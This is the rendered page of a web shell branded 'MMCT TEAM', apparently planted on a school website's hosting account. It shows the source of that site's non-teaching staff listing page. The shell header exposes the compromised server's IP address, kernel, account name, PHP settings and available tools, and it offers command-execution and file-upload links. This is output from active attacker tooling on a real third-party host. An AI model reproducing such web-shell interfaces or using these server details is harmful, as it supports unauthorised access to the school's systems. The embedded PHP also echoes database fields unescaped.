MMCT TEAM
Server IP : 2a02:4780:3:2287:0:3736:a38e:8  /  Your IP : 216.73.216.63
Web Server : LiteSpeed
System : Linux sg-nme-web2187.main-hosting.eu 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
User : u926327694 ( 926327694)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u926327694/domains/svschool.in/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u926327694/domains/svschool.in/public_html/non-teaching-staff.php
<?php
    include('header.php');
    $news_letter_class = "newsletter-area-3";
?>

<section class="page-banner">
    <div class="container">
        <h2 class="about-title custom_title"><span>Non Teaching Staff</span></h2>
        <div class="row teachers-row">
            <?php
                $query_mng = mysqli_query($con,"select * from staff_management where is_active=1 and staff_type='Non-Teaching'");
                while($res_mng = mysqli_fetch_array($query_mng))
                {
            ?>
            <div class="col-md-4 col-sm-6 teachers-col mb-30">
                <div class="single-teacher mt-80 text-center">
                    <div class="teacher-social"></div>
                    <div class="teacher-image">
                        <a href="staff-details.php?id=<?php echo $res_mng['id']; ?>">
                            <img src="adminweb/<?php echo $res_mng['photo']; ?>" alt="teacher">
                        </a>
                    </div>
                    <div class="teacher-content">
                        <h4 class="name"><a href="teacher-details.php"><?php echo $res_mng['name']; ?></a></h4>
                        <span class="designation"><?php echo $res_mng['designation']; ?></span>
                    </div>
                </div>
            </div>
            <?php
                }
            ?>
        </div>
    </div>
</section>

<?php include('footer.php'); ?>

MMCT - 2023